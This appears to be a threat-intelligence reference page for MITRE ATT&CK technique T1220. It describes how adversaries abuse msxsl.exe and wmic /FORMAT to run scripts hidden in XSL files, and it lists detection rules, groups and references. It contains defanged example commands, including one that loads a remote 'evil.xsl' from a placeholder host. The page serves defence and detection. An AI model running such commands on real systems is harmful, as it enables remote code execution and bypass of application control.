XSL Script Processing

T1220

Technique.View on attack.mitre.org

About this technique

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages.

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.

Command-line examples:

* msxsl.exe customers[.]xml script[.]xsl
* msxsl.exe script[.]xsl script[.]xsl
* msxsl.exe script[.]jpeg script[.]jpeg

Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file. This technique can also execute local/remote scripts and, similar to its Regsvr32/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.

Command-line examples:

* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”

Detection rules8

Rules on DetectionCode tagged with T1220.

Sigma5

RuleLevelLog source
Potential Remote SquiblyTwo Technique Executionhighwindows / process_creation
Remote XSL Execution Via Msxsl.EXEhighwindows / process_creation
Msxsl.EXE Executionmediumwindows / process_creation
WMIC Loading Scripting Librariesmediumwindows / image_load
XSL Script Execution Via WMIC.EXEmediumwindows / process_creation

Splunk3

RuleTypeRiskData source
Cisco NVM - Suspicious Network Connection Initiated via MsXslAnomalyNULLCisco Network Visibility Module Flow Data
WMIC XSL Execution via URLTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2, Cisco Network Visibility Module Flow Data
XSL Script Execution With WMICTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2

Groups2

Software1

Campaigns1

Procedure examples4

Groups2

Used byProcedure example
GroupCobalt Group

Cobalt Group used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.

GroupHigaisa

Higaisa used an XSL file to run VBScript code.

Software1

Used byProcedure example
MalwareAstaroth

Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain.

Campaigns1

Used byProcedure example
CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.

References6

  1. LOLBAS Wmic Open source
    LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
  2. Microsoft XSLT Script Mar 2017 Open source
    Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using <msxsl:script>. Retrieved July 3, 2018.
  3. Microsoft msxsl.exe Open source
    Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.
  4. Penetration Testing Lab MSXSL July 2017 Open source
    netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018.
  5. Reaqta MSXSL Spearphishing MAR 2018 Open source
    Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.
  6. XSL Bypass Mar 2019 Open source
    Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.